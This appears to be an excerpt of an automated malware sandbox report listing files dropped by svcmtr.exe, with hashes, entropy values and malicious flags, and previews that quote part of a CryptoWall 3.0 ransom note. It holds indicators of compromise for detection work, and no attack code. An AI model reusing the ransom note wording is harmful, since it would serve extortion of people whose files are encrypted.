                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):606
                                                                                                                          Entropy (8bit):6.728423080747645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TGgdBemCRhp0ZUIcHyn:c+z5U4a8OoDUX+S2TGgtCR30ZUtHyn
                                                                                                                          MD5:032C25D9BF739DD396D9E3A7E0FD013E
                                                                                                                          SHA1:5F0112469E210AD0F899C0A2E32B848E6D1BC860
                                                                                                                          SHA-256:B3236C208F22A273AAAE1DF044E32B116276A6585073D1772FB40C0D681DAE13
                                                                                                                          SHA-512:24FD40CCBA085AF8E8F2CB26373037DC42CC513C02BD47D1FD487968F2D7BBD76713A351D6DBFF9593E6647BA2C229517D24107DB3D374A9390D91F34479830F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....^G..c..0..4.....lp...bm.|...P.B..++Y..>Q..(....G&l.z,"V..SI.~5./.....n......eN.I|b.p|.aj..jvp..j....+X..A..x........ %.r)M%b.l;.8dD.'.5...>".d<6P$Yez..L>Ju........L..4......!>..3R.=....L.y.....T....
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):622
                                                                                                                          Entropy (8bit):6.728876161724913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS27VWbz8IcZ1M7fcDGIaU/fIp:c+z5U4a8OoDUX+S27VW8fM7fcdep
                                                                                                                          MD5:0B50CED734C993B76B9D400F38D2074D
                                                                                                                          SHA1:D89C1EA62BA93448E2CD88A87CF4D69F89C938C2
                                                                                                                          SHA-256:98EF7CF3826FAC1956EADC1D4B551393BEF783A1AF641E1AEC3330E45EE6565E
                                                                                                                          SHA-512:867422502861C6FAD25C177236674ADE49CCC927433743E3F9379ECE7DACCDAC08EBD3E06D1C0DEBAAB82A93C1DE963880E092F2BA9CD1390E22C0595F6C3A2C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..K..+..F...qV.q.o....j.(WE..A..n..P1_.A.O..&.)..q+#..t.%..e(R.......&]].$.............^.]....ggf..r..~..2m.5..Br..........k.`...!^;=..g...5V.r..A..(..<#..%F+.3.......8.0.H..`.,5.`.j.mF.T...J.=.W.."<./1.+U~m{..m.E.<.C]
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.989773860262692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gcm+DNlgIxh/ksLJCNCgyZZiI9bJsUe4riyaUxeLCkVdL6OZyFv:Gj+5Ku/POxMtsUHriyaUxeLCEdTgv
                                                                                                                          MD5:BA7AFF654DD206D2E427546C3E77D7D5
                                                                                                                          SHA1:B1BC612F17D271FF82C39BE009AC4EB0CF10FF85
                                                                                                                          SHA-256:AF9F32D5743C2B6FB3DCBB8C4B8353A3D920DF237E9B1210B507870D88971927
                                                                                                                          SHA-512:BBC10636B0AAD13624033A9C0779AA82AD640BD9B6EF88E952DE772DC9B2BB67E885FCD117EC140E209ACF40B794DB0DC2A845D0C640CC0396BAC258138C40E0
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981040414247804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GgU1hOA6Zxc93CfbFH1UvDAQhKuFcbm+4xt:Gp16rC3CzIDAQhKWc54P
                                                                                                                          MD5:4A2988EB4EB9416D6A3CB4A07D4BD45B
                                                                                                                          SHA1:361188B39DADCDECBF54FC173E929F78BC5EB8B2
                                                                                                                          SHA-256:859F9423CC4524A89959B9DF8643F6868B1199551A891DB0371B9A983F0823F2
                                                                                                                          SHA-512:C3D61543B4B48E809CA3B8D768877FF229950B416E509101BCB65627E03D7E19FDE91BA4438D1B7613A148BA4744A355A4AADE48B089BB6CF2D818C7919385E4
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.969496407988378
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GoSa5P+lngzzOg8+GRXbjyLygjXQKOFPT7YvWcgVj9jXpmKI:GPzngxNMXbjyLygTfsqWnj/I
                                                                                                                          MD5:97D828637701229C46EFB47DC0BFE30E
                                                                                                                          SHA1:E55A7DFC2BB0ECD413A142B43C27B5083DB6CEE3
                                                                                                                          SHA-256:9A823EEE593AECCA2E03EEBC1672C640E64F3ABEDA12E3657A660884AC4B37DA
                                                                                                                          SHA-512:5973818530CACBDE2A6726C6C699189EEC2BA538F94C64CB6FA1BDB8558F8F923841B834C8381FD22EC1740C8A16E308B3E2823A43CF5EF9072D6D3E05C2889E
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.988602165986239
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gi8HYg1mZ75L3tFX+JWk2bHAk8HySNUC5NQn3KSVW0emlLIJtTdPqI9tiD:Gi84HFLuJWXAk8HySiDn6AW0vsNna
                                                                                                                          MD5:0C5D0495B087D34521B0974F6759C34B
                                                                                                                          SHA1:808282B814E99680B847A24A9421FE29751F4B7D
                                                                                                                          SHA-256:EBB4FC79ACA34D99F48FF18D031ED5853F656F7687383536317131B4741C176B
                                                                                                                          SHA-512:EFD2304EB0A8046AC8D87B4B0B28D7E475E39E4E2749E6B30CF2DE5C3427B5797B8A62A379B483F47D94E52B0DA3D7037C8BD4B03EBB15FBCA0BD8FD8C0925AD
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981412391394323
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gom+1E73mDO+R4OzYbqIJHCi0jU6VE4Xy0+ziCL2Zvn0wTCciLfobshBlaDLG:Gd+e7WDOGGq+iiILr+uBnZTFhbsOG
                                                                                                                          MD5:F7E6CEB5091A60021280A78E8885140D
                                                                                                                          SHA1:446391E1A2E1866A90AF72D2794C5C20EC8F76B5
                                                                                                                          SHA-256:D8B0CC4D36AB180BF86DC304CE5C7601EF9941E22D9CD6EB2F159957E5F4FEE8
                                                                                                                          SHA-512:0921B5713B4450ADBEF056B15BCC79DBC983AF3254C521998BD20FB263A35E5904C6E4BF61D865446950DCDF56EA072A265C7B3F72787F6BB91A072794789F66
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):9134
                                                                                                                          Entropy (8bit):7.972852841079598
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Gog0hlz7Frv7AeOK9zc/eHVod6WLHGFQZ5CZGPUz6jtPaAs:GIhlBv7AeOocKwLHGuZ52GMw8As
                                                                                                                          MD5:13497EB70F861F0988671CA55A56948D
                                                                                                                          SHA1:ED7092CF409DACB0EA9533983FA8F50027275E14
                                                                                                                          SHA-256:673D5968CE1B4010629B3C6E7D421BFBDE5F9B1C176332AD68DF77B058823226
                                                                                                                          SHA-512:D7FC4B9FCA2C41C5C8A495BC0AB51CA1A7816D94A869DA1E675763BAD2DDEAC5FBD7953F7A7CAD4620C8DA3684ADB747D089A7EB635EFC56AE3F6C6BABAF8AD0
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127054
                                                                                                                          Entropy (8bit):7.998469810574002
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:xET/+IUO1uigdZWV4c8MuicmNjxu4DFkPM5:x0/MOOWVAMui1Nk4yPM5
                                                                                                                          MD5:1502AE3E687FB14DA96F4C905F7DBA9C
                                                                                                                          SHA1:8BCB58355B57EC420D7BF5FE5636D523B4CFCB37
                                                                                                                          SHA-256:55EBA40339A797A63052745E97127E13B3A80B189C46D08BCCEEB40CB815F2C5
                                                                                                                          SHA-512:521FC3392587803F8F1003F6501D2094B5A4875DF343AABFC935DE9783FA3BF6019871891A7F5C1E5AC49C599F2591E9436934A9B13F8426B66CEAEE96490902
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):130398
                                                                                                                          Entropy (8bit):7.998168039977826
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:HK4LjNsOgWlwIc62Lir09sDNLvwa98DW5Th0:H+OdlLc6WuDNMKT+
                                                                                                                          MD5:AC2F85D273F3688CEB9E86D45119080C
                                                                                                                          SHA1:39F26E58A91CCBA24B5B3414C4445EB5DE2A99B1
                                                                                                                          SHA-256:D6E5BC6D4C15AC8F3223750AA8B05A8230ADAD4A68D5211E4ADE62B913532FC2
                                                                                                                          SHA-512:D5AEFB267537511D53E9D6ED6252321E30D28870704BBFE5E054341D3740E864D74D770F916C3467FA5DE646FC1AF6499EC979E76F36BDA36239080D23E913F2
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127438
                                                                                                                          Entropy (8bit):7.998541337307893
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:TzuOdnrgJWqrYOReNQIRcR04yAlbVOM1cf7/bkmIhhhutwfvrQLTpm5jJK130tGw:TzNr9MjIRczPctbpIf1nreTpeV3vB
                                                                                                                          MD5:50FF8964465877B163BAB319A53FCB81
                                                                                                                          SHA1:FA65FA124A1BC7F5167D679D5A2EC6A9D790DA94
                                                                                                                          SHA-256:930F8A8C8F927D285F108D35523B54934654B924664AFE675F26009C99961B9D
                                                                                                                          SHA-512:02624F184A697ADA6758515BBDC21D6958696D00A26001E044B08DFB28F091616BC17DD72B8EA446F0AAAA864B22327F7D6025FBF5EFC8C61E01C52A1CF9A494
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128654
                                                                                                                          Entropy (8bit):7.998345705992748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:lIx0WPcgpmbHrZKkSv6OiNS81xY4Pasahurr3PS6oB8FzD52nHiUZ:6qW6ZTSv6885aBunPS67zlmHZ
                                                                                                                          MD5:369DF8ED1787F571FAF4B997C69BA912
                                                                                                                          SHA1:7D7FB1B91DB0BB973F94C24F548654E279D38A15
                                                                                                                          SHA-256:ACB0AC1211850D881787B1A5799D3B9F72623DE1AFE970C9C4BB923370ECEA3B
                                                                                                                          SHA-512:79899FC646135B7FE299F642F9CD98A22B7C22603EE33BE6D8EE971DDF729B6A2C3F84A6048E7D94C2E0C3AAADCE3B6EDBC4668182225E81F9A457E1D2F1B11C
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128654
                                                                                                                          Entropy (8bit):7.998345705992748
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:lIx0WPcgpmbHrZKkSv6OiNS81xY4Pasahurr3PS6oB8FzD52nHiUZ:6qW6ZTSv6885aBunPS67zlmHZ
                                                                                                                          MD5:369DF8ED1787F571FAF4B997C69BA912
                                                                                                                          SHA1:7D7FB1B91DB0BB973F94C24F548654E279D38A15
                                                                                                                          SHA-256:ACB0AC1211850D881787B1A5799D3B9F72623DE1AFE970C9C4BB923370ECEA3B
                                                                                                                          SHA-512:79899FC646135B7FE299F642F9CD98A22B7C22603EE33BE6D8EE971DDF729B6A2C3F84A6048E7D94C2E0C3AAADCE3B6EDBC4668182225E81F9A457E1D2F1B11C
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126814
                                                                                                                          Entropy (8bit):7.998625779435899
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:CPrbendZiGT10jBwHghxTl0+sXYWP+dvMnSeaCnGGy:CDqziq2BwHWK+pWP+teaC0
                                                                                                                          MD5:050CEB46AF16463982566CDEBBBFFA6B
                                                                                                                          SHA1:40410EB1D1013A8A64AD44655CB6E2F4BBDABEF9
                                                                                                                          SHA-256:063CB50A4519875E7F742E362939820F3C42D1AEF5F65A20FF3F72275EAE7569
                                                                                                                          SHA-512:EBED1ACC08899CF9ED7E62265CC2951DDBEC733EBE0472F5F313C8CAD82A616308F78A1F169014DB853A30AB78144F8AA3262784A374D96F242CF4264E91839A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128126
                                                                                                                          Entropy (8bit):7.998494092822444
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IssHGYECF3+/YkCqoXuoOAO1kuBUclEZ2nsXcH:IXmYECNcYbXTIkwHEZI
                                                                                                                          MD5:3DC1FE9E6B4E2358090575168812CA95
                                                                                                                          SHA1:446A28BC9C0EF670384F0F9A4E855580E0D7BFE5
                                                                                                                          SHA-256:0C0E338EF8E962B6DA8846129EAB0EA3E1991B5522B462B2EC243E2E6D860D94
                                                                                                                          SHA-512:E5EBD4A3F291BB08B0849D9D400EC8BE6D9F473C1CB06532AC685363078A875F87FCE1F61E1E5412A65E8D9EB0C161BB24966E2B6F8DF6D3BF043601A82E501A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131326
                                                                                                                          Entropy (8bit):7.998537350730651
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:gDkNHG7wCgnTyLg3woy5WaJCHlLJeeUQ2+x/Mv9LMCmuug:gDk9G75JLg3wo6E9JlUQLk9LMCUg
                                                                                                                          MD5:55569FD0E1DE5BFE4FC3C324BA4E0D85
                                                                                                                          SHA1:E58D3E93B0055293C8152E21596AD8A8721CB9D3
                                                                                                                          SHA-256:56EB47732FFCEEBDE0C86520CC4B7725E9CC158AA55FC0A434C85AD5D856FF2E
                                                                                                                          SHA-512:DF52FC55CAF97D6425667EA01641BCDE3D7FE540BF7DAC4D802601D17D3D3F0ABA281F04BA5C9029D4414A4E17CEE2C8CAD66AFBB56A681E0F7B687B5592430A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129854
                                                                                                                          Entropy (8bit):7.998308261670788
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:pIpfuTT5VKXbFZoI6PZZRvqD55qlvGn3G3p+ydRZfVB+RgsUj3Oeqpp:WpGTTmXbFZELRS55qtGnWEyNAUTBq/
                                                                                                                          MD5:E2489D440F6A490DE9E87113825692F9
                                                                                                                          SHA1:B0E4F8BB24AE37A8FDF78B907A805F8B567B9C27
                                                                                                                          SHA-256:53D11FF760DE452624AD9B4EFFCC7C3AED1918820F429005C3BF710A71F6D0A2
                                                                                                                          SHA-512:0C8C22137FAB30D8F9EA03BF854AD18BE36973DC1D7043FB5C7999AC38AF4759EE344EE83E16846A307A3AA9967F5B67B22B43C03F73A9B927F148EDEF5F92A7
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132590
                                                                                                                          Entropy (8bit):7.998533677693934
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:KD9CrTNq5kpyjVqSXlH39plfc6VLHmok+Ez+COW9:Kx4TsCpyBjtXfLYZIi
                                                                                                                          MD5:84F67D72EBC825226C9FAA825B2550B9
                                                                                                                          SHA1:CF34FF635946CE8EE53A09B7AAD92223BD7A7FCD
                                                                                                                          SHA-256:4186900B152364457C835FB2FE377B445A7C60625216225877006883C45BA2D1
                                                                                                                          SHA-512:E0CD0D206AEC1E629150491897A81DC1C3A295212727A48F5A8851EE4791D15FA0B7DD542A2F86FACEA6D0504436D48BFFC72DDFAEAE330B868267270593AE76
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):133326
                                                                                                                          Entropy (8bit):7.998783408851753
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mj++6NkrSgJ13gVFE9oqOU0oTM0mTfJ0S0jaZLg8l:tPNSF3gDE9oqOU0oYx0SU78l
                                                                                                                          MD5:4CD89FA4D8A5CB5EC817CA4402CA24A3
                                                                                                                          SHA1:5B60374518AD7413B1BFB05735614545C8F99944
                                                                                                                          SHA-256:F350D0A50E6D8A02408C038453162C4DF03B2246C6AE08C067125F058941B597
                                                                                                                          SHA-512:FE51A495D530DDF6153F8187002FD592E5923E51BFB3E1E45EFEA09789270C223F44AD4038E6049557C80CF23D816471E1B10406BDB7DC90921D10B83F4716A0
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131550
                                                                                                                          Entropy (8bit):7.998745199118534
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:cfJCdY5cEnzCoifKl8fD+/WuwfaV+ioDLzhb:cZc+CNClQD+/WuwSgioDLzR
                                                                                                                          MD5:AA911201E350D4BF40E4CFD04BF910C8
                                                                                                                          SHA1:1A9E51706261324B6E935B253CD85CD73DF083EB
                                                                                                                          SHA-256:9B859BE76EA2F434B53CA6D667A40C129A1668FAEA86A16BF0222A9830E1DA08
                                                                                                                          SHA-512:59852AF0788B6ECC55693023B470289F61B867A5722FFAE9DE5020672E21CC021B5098ED0CE7D262305A3C78072511CCB99CB4A2DCE58FEAB994AAD6EA9DBFEE
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998445226522374
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/YxYSVZmaG3jy84ysHRxH05oMIL9TGYuQCVAE:/Yx7SacyBaoMwGzt
                                                                                                                          MD5:F03340BA1D05C2B919F05DE4C563E238
                                                                                                                          SHA1:292F937EC18A2E84FE99427EF8EF6410C7A99EDC
                                                                                                                          SHA-256:BBD548BB8AA111B333AC603B7397AF38F0929BD29107A60C835E2A893F954F57
                                                                                                                          SHA-512:D9A4FD840498C8CADAB8C266DBB2112F9FC4F7EC86475A299C370582B54F7BED228459568558BF064C8225F0212569BC7758AE750EDC1DEC2A9906656D825F39
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126526
                                                                                                                          Entropy (8bit):7.998564999149565
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:MJbOqpwvnFHFCXaR+HxShrTZ/XjOUJec1:Df1RkcZ/TOUD
                                                                                                                          MD5:440CAEE76CAAD54FCDE6D231F74E2766
                                                                                                                          SHA1:A3BB10310671F4A0299EE8ACEB84366B990843FF
                                                                                                                          SHA-256:D93DA82CD4FF9F31E840259A185CE99F000A50CB382FF47E3B23831C28A8CEC7
                                                                                                                          SHA-512:FEB1D17C8D17D12486907DC2D698D25CF5420E48348090760054E8F9232588D79504DCC18C5F440CA5A2E318092B0AB18B941BDA1D7AF2C83A30B46C6A5AFB5E
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):128878
                                                                                                                          Entropy (8bit):7.998374238352071
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:RviQITR8zhahzwDdhqSl3skcWFOCky0rBbP8zl9r2csw0TXMhOn:cQjzG0dhq4uWFmJhP2f2/B4kn
                                                                                                                          MD5:A9139194BF3BDB53EE1F063A7F143136
                                                                                                                          SHA1:E420C847BE020F327328B6A8F05509ABA60E8490
                                                                                                                          SHA-256:FDFAC6B95D3F189C3696F9E3AAAEC149327040E30FBD556984F84B0557065205
                                                                                                                          SHA-512:2EAEAD34118C493BE9386524A6396284CBA0CD3350479F5E3831E81B205EE6F188B4802EA1D8B1B93E18168AA3FA678757121B0A614ECD3DEC0E066376EA67A3
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123454
                                                                                                                          Entropy (8bit):7.998163291988781
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:yBx0O3cXQ6Ezrm5OTdWVUuvnsy8BvhV+ippuALPqtfEEULNxodTWj3/qO31k:WSXirrRW2uvsxvhQSLitfv0/gij3yOFk
                                                                                                                          MD5:438C468DD46D40DD48FC87FAFDEF6710
                                                                                                                          SHA1:3AF7043320730C17D450C0BB7DDA8D152CD5C84F
                                                                                                                          SHA-256:178DB582130153DD924023DF489118E4F193C9A9F530E9C736AF6FA1F0C795F5
                                                                                                                          SHA-512:316328415C68BA5F85E7AACF9C4D7A79A89BEE1E8AF5EBDFCB7BD6A974129B99AEA5E81895BD66B36D76A43C3DAEAFE4EBAAE88A61C511E2AD7E7BFF032F43FB
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129486
                                                                                                                          Entropy (8bit):7.998590767033311
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:BZkMKfquDs5CTafV7J9Tkik88JlGfNiLqexQ7e+:BmMKS0AfVN9TkikhlGfNOqexQ6+
                                                                                                                          MD5:53A1B3D4391C07CEECC105D41E8A8467
                                                                                                                          SHA1:0C5C3DF949C1F0E4E044EEA3E29590C0185BE866
                                                                                                                          SHA-256:CA984678D10B6F3F2BFB2441E4804F298BB14DC3756B2CDBD80687133E8B915A
                                                                                                                          SHA-512:1A0B6B5CB978B5C357A2C31E7E236172395B9E283C88F2EBF2B9E7722E40F940012CC91D93D084B3DA45364BB6A0D10A1D719660200D4F65EC6296E5FF32085A
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126078
                                                                                                                          Entropy (8bit):7.998172839977404
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:OXf59EuoaR/j3d0BvhXzCZEFCGVqFcmW0Nb00d:Id8zCZkCgcW0H
                                                                                                                          MD5:C5FC860D94F04CDC44269640CD8149F9
                                                                                                                          SHA1:B4185A435576F9ED6D4657AE5748C97AFD1B044C
                                                                                                                          SHA-256:4504A7F58BE053D1B6C69405E6F7FA6D36462308C48A3058B726DE6C0DC12F53
                                                                                                                          SHA-512:6EE642C4CB6F8C9FC129DA35D026E5240616D9572FEA287D0323C1BE873AB962D1639B7EEA58EB9EF7D061A36934F1770F0C36A80E365E1A09DD5A7EBAE06628
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132574
                                                                                                                          Entropy (8bit):7.998728436953894
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:mEnv1DzJAvHWfaR03+b9zmqiVJ6mL69yclO:m6v9zJkWSa3Izqr6NO
                                                                                                                          MD5:D18594C3394674413B6C2653E24D40D7
                                                                                                                          SHA1:7DDB34436954342F9C1152441C52F4A055CD235C
                                                                                                                          SHA-256:E7BA6C0C42EC7E01390E9D612C9FFB2D5C89F441A8E7746E7D50492DA67E62D2
                                                                                                                          SHA-512:C00FF32915660DB2D1E787DB500F4F4DCAE83936114998E6BE460EBDF1B98A7F8B5F27CF838B3C8AFE1503F0DCB6F991C995103AED1C12503DA685BA7F724790
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131486
                                                                                                                          Entropy (8bit):7.998538164018805
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:/j6HVBOP2N7xGFQj8V1RHG5g+UiAq6Ca/wXEtR+nMmAj:gh7EqjK1RHPXw6Crjhi
                                                                                                                          MD5:7FD9A56F0126A97D908FD0A17A9AFD51
